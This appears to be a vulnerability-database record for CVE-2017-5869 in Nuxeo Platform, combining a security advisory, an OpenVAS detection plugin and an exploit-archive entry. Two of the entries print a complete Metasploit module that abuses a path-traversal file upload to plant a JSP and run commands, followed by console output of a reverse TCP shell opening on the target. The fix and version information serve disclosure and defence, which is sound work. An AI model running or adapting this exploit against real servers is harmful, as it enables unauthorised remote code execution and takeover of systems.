\nIt embeds an Apache Tomcat server, and can be managed through a web \ninterface. \n \nOne of its features allows authenticated users to import files to the \nplatform. \nBy crafting the upload request with a specific ``X-File-Name`` header, \none can successfuly upload a file at an arbitrary location of the server \nfile system. \n \nIt is then possible to upload a JSP script to the root directory of the \nweb application to execute commands on the remote host operating system. \nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the \n``X-File-Name`` header is a way to do so. \n \n## Details \n \n**CVE ID**: CVE-2017-5869 \n \n**Access Vector**: network \n \n**Security Risk**: high \n \n**Vulnerability**: CWE-434 \n \n**CVSS Base Score**: 8.8 \n \n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H \n \n# Proof of Concept \n \nHere is a metasploit module to exploit this vulnerability: \n \n```ruby \n## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Nuxeo Platform File Upload RCE\", \n'Description' => %q{ \nThe Nuxeo Platform tool is vulnerable to an \nauthenticated remote code execution, \nthanks to an upload module. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => ['Ronan Kervella \n<r.kervella@sysdream.com>'], \n'References' => \n[ \n['https://nuxeo.com/', ''] \n], \n'Platform' => %w{linux}, \n'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', \n'Platform' => 'linux'] ], \n'Arch' => ARCH_JAVA, \n'Privileged' => true, \n'Payload' => {}, \n'DisclosureDate' => \"\", \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the nuxeo \napplication', '/nuxeo']), \nOptString.new('USERNAME', [true, 'A valid username', '']), \nOptString.new('PASSWORD', [true, 'Password linked to the \nusername', '']) \n], self.class) \nend \n \ndef jsp_filename \n@jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp' \nend \n \ndef jsp_path \n'nxserver/nuxeo.war/' + jsp_filename \nend \n \ndef nuxeo_login \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/login.jsp') \n) \n \nfail_with(Failure::Unreachable, 'No response received from the \ntarget.') unless res \nsession_cookie = res.get_cookies \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/nxstartup.faces'), \n'cookie' => session_cookie, \n'vars_post' => { \n'user_name' => datastore['USERNAME'], \n'user_password' => datastore['PASSWORD'], \n'submit' => 'Connexion' \n} \n) \nreturn session_cookie if res && res.code == 302 && \nres.redirection.to_s.include?('view_home.faces') \nnil \nend \n \ndef trigger_shell \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, jsp_filename) \n) \nfail_with(Failure::Unknown, 'Unable to get \n#{full_uri}/#{jsp_filename}') unless res && res.code == 200 \nend \n \ndef exploit \nprint_status(\"Authenticating using \n#{datastore['USERNAME']}:#{datastore['PASSWORD']}\") \nsession_cookie = nuxeo_login \nif session_cookie \npayload_url = normalize_uri(target_uri.path, jsp_filename) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => 
normalize_uri(target_uri.path, \n'/site/automation/batch/upload'), \n'cookie' => session_cookie, \n'headers' => { \n'X-File-Name' => '../../' + jsp_path, \n'X-Batch-Id' => '00', \n'X-File-Size' => '1024', \n'X-File-Type' => '', \n'X-File-Idx' => '0', \n'X-Requested-With' => 'XMLHttpRequest' \n}, \n'ctype' => '', \n'data' => payload.encoded \n) \nfail_with(Failure::Unknown, 'Unable to upload the payload') \nunless res && res.code == 200 \nprint_status(\"Executing the payload at \n#{normalize_uri(target_uri.path, payload_url)}.\") \ntrigger_shell \nelse \nfail_with(Failure::Unknown, 'Unable to login') \nend \nend \n \nend \n``` \n \nModule output: \n \n```bash \nmsf> use exploit/multi/http/nuxeo \nmsf exploit(nuxeo) > set USERNAME user1 \nUSERNAME => user1 \nmsf exploit(nuxeo) > set PASSWORD password \nPASSWORD => password \nmsf exploit(nuxeo) > set rhost 192.168.253.132 \nrhost => 192.168.253.132 \nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp \npayload => java/jsp_shell_reverse_tcp \nmsf exploit(nuxeo) > set lhost 192.168.253.1 \nlhost => 192.168.253.1 \nmsf exploit(nuxeo) > exploit \n \n[-] Handler failed to bind to 192.168.253.1:4444:- - \n[*] Started reverse TCP handler on 0.0.0.0:4444 \n[*] Authenticating using user1:password \n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp. 
\n[*] Command shell session 1 opened (172.17.0.2:4444 -> \n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000 \n \nid \nuid=1000(nuxeo) gid=1000(nuxeo) \ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare) \npwd \n/var/lib/nuxeo/server \n``` \n \n# Vulnerable code \n \nThe vulnerable code is located in the \n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github \nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)), \nwhere the header ``X-File-Name`` is not checked. \n \n# Fix \n \nNuxeo provided a \n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892) \nfor this issue. \nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35). \n \nPlease note that vulnerability does not affect Nuxeo versions above 7.3. \n \n# Affected versions \n \n* Nuxeo 6.0 (LTS 2014), released 2014-11-06 \n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15 \n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24 \n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24 \n \n# Unaffected versions \n \n* Nuxeo 6.0 HF35, released 2017-01-12 \n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02 \n* Nuxeo 7.10 (LTS 2015), released 2015-11-09 \n* Nuxeo 8.10 (LTS 2016), released 2016-12-06 \n \n# Credits \n \nRonan Kervella <r.kervella@sysdream.com> \n \n-- \nSYSDREAM Labs <labs@sysdream.com> \n \nGPG : \n47D1 E124 C43E F992 2A2E \n1551 8EB4 8CD9 D5B2 59A1 \n \n* Website: https://sysdream.com/ \n* Twitter: @sysdream \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141811/nuxeo-shell.txt"}], "openvas": [{"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5869"], "description": 
"Nuxeo Platform is prone to a authenticated directory traversal\nvulnerability.", "modified": "2018-10-26T00:00:00", "published": "2017-03-27T00:00:00", "id": "OPENVAS:1361412562310106696", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106696", "type": "openvas", "title": "Nuxeo Platform Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nuxeo_platform_dir_trav_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Nuxeo Platform Directory Traversal Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:nuxeo:platform\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106696\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-27 14:18:27 +0700 (Mon, 27 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-5869\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Nuxeo Platform Directory Traversal Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nuxeo_platform_detect.nasl\");\n script_mandatory_keys(\"nuxeo_platform/installed\");\n\n script_tag(name:\"summary\", value:\"Nuxeo Platform is prone to a authenticated directory traversal\nvulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Directory traversal vulnerability in the file import feature allows remote\nauthenticated users to upload and execute arbitrary JSP code via a .. 
(dot dot) in the X-File-Name header.\");\n\n script_tag(name:\"impact\", value:\"An authenticated attacker may upload and execute arbitrary JSP code.\");\n\n script_tag(name:\"affected\", value:\"Nuxeo Platform 6.0, 7.1, 7.2 and 7.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.4 or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2017/03/23/6\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"6.0\", test_version2: \"7.3\") || version == \"lts-2014\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.4\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nNuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)", "edition": 1, "published": "2017-03-27T00:00:00", "title": "Nuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-27T00:00:00", "id": "EXPLOITPACK:3BDE07924AD5019982D9337367D7DB4E", "href": "", "sourceData": "=begin\n# Description\n\nNuxeo Platform is a content management system for enterprises (CMS).\nIt embeds an Apache Tomcat server, and can be managed through a web\ninterface.\n\nOne of its features allows authenticated users to import files to the\nplatform.\nBy crafting the upload request with a specific ``X-File-Name`` header,\none can successfuly upload a file at an arbitrary location of the server\nfile system.\n\nIt is then possible to upload a JSP script to the root directory of the\nweb application to execute commands on the remote host operating system.\nSetting the value 
``../../nxserver/nuxeo.war/shell.jsp`` to the\n``X-File-Name`` header is a way to do so.\n\n## Details\n\n**CVE ID**: CVE-2017-5869\n\n**Access Vector**: network\n\n**Security Risk**: high\n\n**Vulnerability**: CWE-434\n\n**CVSS Base Score**: 8.8\n\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n# Proof of Concept\n\nHere is a metasploit module to exploit this vulnerability:\n\n=end\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Nuxeo Platform File Upload RCE\",\n 'Description' => %q{\n The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,\n thanks to an upload module.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],\n 'References' =>\n [\n ['https://nuxeo.com/', '']\n ],\n 'Platform' => %w{linux},\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => true,\n 'Payload' => {},\n 'DisclosureDate' => \"\",\n 'DefaultTarget' => 0))\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),\n OptString.new('USERNAME', [true, 'A valid username', '']),\n OptString.new('PASSWORD', [true, 'Password linked to the username', ''])\n ], self.class)\n end\n\n def jsp_filename\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\n end\n\n def jsp_path\n 'nxserver/nuxeo.war/' + jsp_filename\n end\n\n def nuxeo_login\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\n )\n\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\n session_cookie = res.get_cookies\n\n res = send_request_cgi(\n 'method' 
=> 'POST',\n 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'user_name' => datastore['USERNAME'],\n 'user_password' => datastore['PASSWORD'],\n 'submit' => 'Connexion'\n }\n )\n return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')\n nil\n end\n\n def trigger_shell\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\n )\n fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200\n end\n\n def exploit\n print_status(\"Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n session_cookie = nuxeo_login\n if session_cookie\n payload_url = normalize_uri(target_uri.path, jsp_filename)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),\n 'cookie' => session_cookie,\n 'headers' => {\n 'X-File-Name' => '../../' + jsp_path,\n 'X-Batch-Id' => '00',\n 'X-File-Size' => '1024',\n 'X-File-Type' => '',\n 'X-File-Idx' => '0',\n 'X-Requested-With' => 'XMLHttpRequest'\n },\n 'ctype' => '',\n 'data' => payload.encoded\n )\n fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200\n print_status(\"Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.\")\n trigger_shell\n else\n fail_with(Failure::Unknown, 'Unable to login')\n end\n end\n\nend\n\n=begin\nModule output:\n\n```bash\nmsf> use exploit/multi/http/nuxeo\nmsf exploit(nuxeo) > set USERNAME user1\nUSERNAME => user1\nmsf exploit(nuxeo) > set PASSWORD password\nPASSWORD => password\nmsf exploit(nuxeo) > set rhost 192.168.253.132\nrhost => 192.168.253.132\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\npayload => java/jsp_shell_reverse_tcp\nmsf exploit(nuxeo) > set lhost 192.168.253.1\nlhost => 192.168.253.1\nmsf exploit(nuxeo) > exploit\n\n[-] Handler failed to bind to 
192.168.253.1:4444:- -\n[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Authenticating using user1:password\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\n\nid\nuid=1000(nuxeo) gid=1000(nuxeo)\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\npwd\n/var/lib/nuxeo/server\n```\n\n# Vulnerable code\n\nThe vulnerable code is located in the\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\nwhere the header ``X-File-Name`` is not checked.\n\n# Fix\n\nNuxeo provided a\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\nfor this issue.\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\n\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\n\n# Affected versions\n\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\n\n# Unaffected versions\n\n* Nuxeo 6.0 HF35, released 2017-01-12\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\n\n# Credits\n\nRonan Kervella <r.kervella@sysdream.com>\n\n-- SYSDREAM Labs <labs@sysdream.com> \nGPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 \n* Website: https://sysdream.com/ \n* Twitter: @sysdream \n=end", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}